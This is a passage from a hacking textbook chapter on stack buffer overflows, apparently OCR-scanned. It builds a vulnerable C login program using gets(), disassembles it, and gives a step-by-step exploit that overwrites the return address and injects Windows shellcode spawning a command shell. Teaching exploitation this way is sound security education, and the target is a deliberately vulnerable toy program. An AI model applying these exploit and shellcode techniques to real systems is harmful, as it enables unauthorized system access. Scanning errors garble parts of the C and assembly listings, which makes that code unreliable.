Practical Example of an Overflow Error | Shellcoders Programming Uncovered (Uncovered series)

Now, having briefly considered the theory, it is time to consider a practical example. Compile the example shown in Listing 8.6 and start it for execution.

Listing 8.6: The example for investigating overflow errors

 #include <stdio.h> root {) {         printf("your have a root!\n"); } main{) {         char passwd[16]; char login[16];         printf("login :"); gets(login);         printf("passwd:"); gets(passwd);         if (!strcmp(login, "bob") && ~strcmp(passwd, "god"))                         printf("hello, bob!\n"); }

This program prompts the user to supply a login name and a password. Because it prompts for user input, this means that it copies the input data into the buffer. Consequently, there is the possibility of overflow. So when the program prompts for user input, enter the string AAA... (a long string composed of A characters ) as the login name and BBB... as the password. The program immediately crashes, displaying the application critical error message (Fig. 8.6). Aha! There is buffer overflow here. Consider it more carefully : Windows states that "The instruction at 0x41414141 referenced memory at 0x41414141 ." Where does the address 41414141h come from? Why, 41h is the hexadecimal code of the A character. This means that there was an overflow in the login name buffer and that this type of overflow allows control to be passed to an arbitrary code, because the IP register went to the address contained in the buffer tail. It just so happens that senseless garbage was located at the 41414141h address, which causes the processor to throw an exception. This situation might be easily corrected.

Figure 8.6: Reaction of the system to buffer overflow

To begin with, it is necessary to discover, which characters of the login name fall into the return address. This goal can be easily achieved using the sequence of characters that appears like qwerty...zxcvbnm . Enter this string, and the system will inform you that "The instruction at Ox7a6c6b6a referenced memory at. " Then start HIEW and enter 7A 6C 6B 6A from the keyboard. You'll obtain the following sequence: zlkj . This means that 17th, 18th, 19th, and 20th characters of the login name fell into the return address (on processors of the x86 architecture, the lower byte is written at the smaller address, which means that the machine word is inverted).

Now it is time to quickly disassemble the program under the field conditions. The disassembled code is provided in Listing 8.7.

Listing 8.7: Disassembling under the field conditions

 .text=00401150 sub_401150        proc near .text:00401150 ; The starting point of the root function ensures .text:00401150 ; all functionality required for the hacker. .text:00401150 ; The starting address plays the key role .text:00401150 ; in passing control. Therefore, it is expedient .text:00401150 ; to record it. The root function doesn't need to be .text:00401150 ; commented, because this example implements it .text=00401150 ; in the form of a "stub." .text=00401150 ; .text=00401150        PUSH  offset aYourHaveARoot ; format .text=00401155        CALL  _printf .text:0040115A        POP   ECX .text:0040115B        RETN .text:0040115B sub_401150        endp .text:0040115B .text:0040115C _main        proc near        ; DATA XREF: .data:0040AODOo .text:0040115C ; Starting point of the main function .text:0040115C .text:0040115C var_20  =  dword ptr -20h .text:0040115C s      = byte  ptr -l0h .text:0040115C ; IDA has automatically recognized two local variables, .text:0040115C ; one of which lies lOh above the bottom of the stack frame .text:0040115C ; and another of which lies 20h bytes higher. .text:0040115C ; Judging by their size, these are buffers. (What else could .text:0040115C ; occupy so many bytes?) .text:0040115C .text:0040115C argc      = dword ptr  4 .text:0040115C argv      = dword ptr  8 .text:0040115C envp      = dword ptr  0Ch .text:0040115C ; Arguments passed to the main functions are of .text:0040115C ; no interest for the moment. .text:0040115C .text:0040115C        ADD   ESP, 0FFFFFFE0h .text:0040115C ; Open the stack frame, subtracting 20h bytes from ESP. .text:0040115C ; .text:0040115F        PUSH  offset aLogin        ; Format .text:00401164        CALL  _printf .text=00401169        POP   ECX .text=00401169 ; printf("login:"); .text=00401169 ; .text:0040116A        LEA  EAX, [esp + 20h + s] .text:0040116E        PUSH  EfX                  ; The s buffer .text:0040116F        CALL  _gets .text=00401174        POP   ECX .text=00401174 ; gets(s); .text:00401174 ; The gets function doesn't control the input string .text:00401174 ; length; therefore, the s buffer might overflow. .text:00401174 ; Because the s buffer lies on the bottom of the stack frame, .text:00401174 ; it is directly followed by the return address; consequently, .text:00401174 ; it is overlapped by bytes  llh to 14h of the s buffer. .text=00401175        PUSH  offset aPasswd         ; Format .text:0040117A        CALL  _printf .text:0040117F        POP   ECX .text:0040117F ; printf("passwd:"); .text:0040117F .text=00401180        PUSH  ESP                   ; The s buffer .text:00401181        CALL  _gets .text=00401186        POP   ECX .text:00401186 ; The gets function is passed the pointer .text:00401186 ; to the stack frame top, where there is the .text:00401186 ; var_20 buffer. Because gets doesn't control the bytes .text:00401186 ; of the lengths of the input string, overflow is possible. .text=00401186 ; Bytes llh to 20h of the var_20 buffer overwrite the s .text=00401186 ; buffer, and bytes 21h to 24h fall to the return .text:00401186 ; address. Thus, the return address can be modified using .text:00401186 ; two different methods, one from the s buffer and the other .text=00401186 ; from the var_20 buffer. .text=00401187        PUSH  offset aBob                ; The s2 buffer .text:0040118C        LEA   EDX, [esp + 24h + s] .text=00401190        PUSH  EDX                        ; The s1 buffer .text:00401191        CALL  _strcmp .text=00401196        ADD   ESP, 8 .text=00401199        TEST  EAX, EAX .text:0040119B        JNZ   short loc_4011C0 .text:0040119D        PUSH  offset aGod                ; The s2 buffer .text:004011A2        LEA   ECX, [ESP + 24h + var_20] .text:004011A6        PUSH  ECX                   ; The s1 buffer .text:004011A7        CALL  _strcmp .text:004011AC        ADD   ESP, 8 .text:004011AF        NOT   EAX .text:004011Bl        TEST  EAX, EAX .text:004011B3        JZ    short loc_4011CO .text:004011B5        PUSH  offset aHelloBob      ; Format .text:004011BA        CALL  _printf .text:004011BF        POP   ECX .text:004011BF ; Checking the password, from the overflowing buffers .text:004011BF ; standpoint, doesn't present anything interesting. .text:004011BF ; .text:004011CO loc_4011CO:                        ; CODE XREF: _main + 3F   j .text:004011CO        ADD   ESP, 20h .text:004011CO ; Close the stack frame. .text:004011CO .text:004011C3        RETN .text:004011C3 ; Retrieving return address and passing control there. .text:004011C3 ; Under normal conditions, RETN returns to the parent .text:004011C3 ; function. However, in the case of overflow, the return .text:004011C3 ; address is modified and different code gains .text:004011C3 ; control. As a rule, this will be the shellcode .text:004011C3 ; of the intruder. .text:004011C3 _main  endp

Having briefly analyzed this disassembled listing, the hacker will detect an interesting root function there. This function allows the hacker to carry out practically everything. The problem is that under normal conditions, it never gains control. However, the hacker can replace the address of its starting point with the return address. And what is the return address of the root function? Here it is: - 0040ll50h . Inverse the order, and you'll get the following: 50 11 40 00 . The return address is stored in memory in exactly this form. Fortunately, zero is encountered only once and falls exactly at the end. Let it be the terminating zero of any ASCIIZ string. The characters with codes 50h and 40h correspond to p and @ . The character with code 11h corresponds to the <Ctrl>+<Q> keyboard shortcut or the following combination: <Alt>+<0, 1, 7> (press and hold the <Alt> key, enter the sequence 0, 1, 7 from numeric keypad, then release the <Alt> key).

Hold your breath , then restart the program for execution and enter the following string as the login name: "qwertyuiopasdfgh P^Q @" . The password can be omitted. In general, the characters "qwertyuiopasdfgh" can be chosen arbitrarily. The main issue is to place the sequence " p^Q @ " exactly in 17th, 18th, and 19th positions . There is no need to enter the terminating zero, because the gets function will insert it automatically.

If everything was done correctly, the program will display the "you have root" string, thus confirming that the attack was completed successfully. If you exit from root, the program will crash immediately, because the stack contains garbage. This, however, is of no importance, because the root function has already completed its job and is no longer needed.

Figure 8.7: Passing control to the root function

Passing control to the function that is ready to use is simple, and it isn't interesting (furthermore, there might be no such function in the program being attacked ). Hackers carry out more efficient attacks by sending their own shellcode to the remote machine and executing it there.

In general, it is not easy to organize a remote shell. To achieve this, the hacker must at least establish a TCP/UDP connection, deceive the firewall, create pipes, map them to the input/output descriptors of the terminal program, and then work as a dispatcher, passing the data between sockets and pipes. Some attackers try a simpler way, attempting to inherit descriptors. However, those who try to use this approach will inevitably be disappointed, because descriptors are not inherited and, consequently, such exploits are unusable. No effort can reanimate them, and all attempts at doing so inevitably fail. In further books, I plan to cover this topic in more detail. For the moment, the discussion will be reduced to the local shell. Even this can be considered a serious achievement for beginners .

Run the demo program again, and overflow the buffer by entering the AAA.... string. However, when the critical error dialog appears, instead of clicking the OK button, click Cancel to start the debugger (note that the debugger must already be installed in the system). Specifically, the contents of the ESP register at the moment of failure are of particular interest. On my machine, it was equal to 00l2FF94h , and on your machine this value might be different. Enter this address into the dump window and scroll it up and down to find the input string ( AAA... ). In my case, this string was located at the following address: 0012FF80h .

Now it is possible to change the return address to 12FF94h , in which case control will be passed to the first byte of the overflowing buffer. After that, it only remains to prepare the shellcode. To call the command interpreter in the operating systems of the Windows NT family, it is necessary to issue the winExec("CMD", x) command. Under Windows 9 x , there is no such file; however, there is command.com. In the Assembly language, this call might look as shown in Listing 8.8 (the code might be entered directly in HIEW).

Listing 8.8: Preparing the shellcode

 00000000: 33CO        XOR    EAX, EAX 00000002: 50          PUSH   EAX 00000003: 68434D4420  PUSH   020444D43 ;" DMC" 00000008: 54          PUSH   ESP 00000009: B8CA73E977  MOV    EAX, 077E973CA ; "wesE" 0000000E: FFDO        CALL   EAX 00000010: EBFE        JMPS   000000010

Here, the entire range of tricks and assumptions is used, a detailed description of which requires a separate book. Briefly, 77E973CAh is the address of the winExec API function, hard-encoded into the program and disclosed by analyzing the export of the kernel32.dll file using the dumpbin utility. This trick is dirty and unreliable, because this address varies from version to version. Thus, more qualified hackers add the export-processing procedure into the shellcode (the procedure itself will be covered in Chapter 11 ). Why is the called address already loaded into the EAX register? Well, this is because call 077E973CAh is assembled into a relative call sensitive to the location of the call, which reduces the portability of the shellcode.

Why is there a blank in the file name "CMD " (020444D43h , read in an inverse order)? This is because the shellcode must not contain a zero character, which serves as the string terminator. If the terminating blank is removed, then the string will appear as 00 0444D43h , which doesn't agree with the hacking plan. Instead, it is necessary to carry out xor eax, eax , thus resetting EAX to zero on the fly and loading it into the stack to form the terminating zero for the "CMD " string. However, the shellcode itself doesn't contain this zero character.

Because the shellcode doesn't fit within the 16 bytes available to it, and because it cannot be optimized any further, it is necessary to resort to lateral troop movement and shift the shellcode into the password buffer, 32 bytes from the return address. Taking into account that the absolute address of the password buffer is equal to l2FF70h (Attention! On your computer this value might be different), the shell-code will appear as shown in Listing 8.9 (simply convert HEX codes into ASCII characters, entering nonprintable characters as <ALT>+<num>, where <num> is the number key on the numeric keypad).

Listing 8.9: Entering the shellcode from the keyboard

 login :1234567890123456  <alt-112><alt-255><alt-18>  passwd:3<alt-192>PhCMD T<alt-184>  <alt-202>s<alt-233>w  <alt-255>        <alt-208><alt-235><254>

Enter this code into the program (the codes specific for each individual machine are in bold). Login will overflow the stack and pass control to the password buffer in which the shellcode resides. The command interpreter prompt will appear on the screen. Now it will be possible to do anything to the system.